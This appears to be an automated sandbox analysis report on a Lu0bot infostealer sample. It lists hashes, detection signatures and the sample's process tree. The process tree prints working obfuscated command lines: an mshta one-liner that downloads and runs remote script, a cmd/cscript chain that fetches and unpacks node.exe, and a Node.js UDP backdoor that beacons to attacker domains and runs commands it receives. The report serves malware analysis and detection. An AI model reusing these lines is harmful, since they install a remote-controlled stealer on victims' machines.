Overview

overview

10

Static

static

euthree_20...19.exe

windows7_x64

10

euthree_20...19.exe

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    09-06-2021 09:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    euthree_20210608-233519.exe

  • Size

    2KB

  • MD5

    cd17d11bb2c8dd9942e816677df2dae2

  • SHA1

    140fbc4ec7fd4be8c66dd38d6836473726fa7c1b

  • SHA256

    5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f

  • SHA512

    31180403ffbe4a2c2144bab8a93aed6d64c85a2c6658b44e8ee7cf8bc1a0e530de4141c0e685826f79457e396bb3d70a25c87ce30a142b481fc9bde0b93c6762

Score
10/10
lu0botstealertrojan

Malware Config

Signatures

  • Lu0bot

    Lu0bot is a lightweight infostealer written in NodeJS.

    trojanstealerlu0bot
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe
    "C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();195;y=unescape('%339%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%32f%652%652%62%7E%326').split('~');150;try{x='WinHttp';35;x=new ActiveXObject(x+'.'+x+'Request.5.1');125;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);82;x.send();165;y='ipt.S';201;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);68;}catch(e){};129;;window.close();"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1623232554288.txt & cscript /nologo /e:jscript get1623232554288.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F2a42161be%26b%3D4d807304" node.cab & expand node.cab node.exe & del get1623232554288.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1623232554288.txt & cscript /nologo /e:jscript get1623232554288.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1623232554288.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4008
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1623232554288.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F2a42161be%26b%3D4d807304" node.cab
          4⤵
          • Blocklisted process makes network request
          PID:4004
        • C:\Windows\SysWOW64\expand.exe
          expand node.cab node.exe
          4⤵
          • Drops file in Windows directory
          PID:2596
        • C:\Windows\SysWOW64\cscript.exe
          cscript /nologo /e:jscript get1623232554288.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3564
          • C:\ProgramData\DNTException\node.exe
            "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27a42161be%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
            5⤵
            • Executes dropped EXE
            PID:1312

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1312-127-0x000000003D000000-0x000000003D001000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1312-126-0x0000000025300000-0x0000000025301000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1312-128-0x000000000E800000-0x000000000E801000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1312-125-0x000000002C000000-0x000000002C001000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1312-129-0x000000000F100000-0x000000000F101000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1312-130-0x0000000026200000-0x0000000026201000-memory.dmp

    Filesize

    4KB

    Download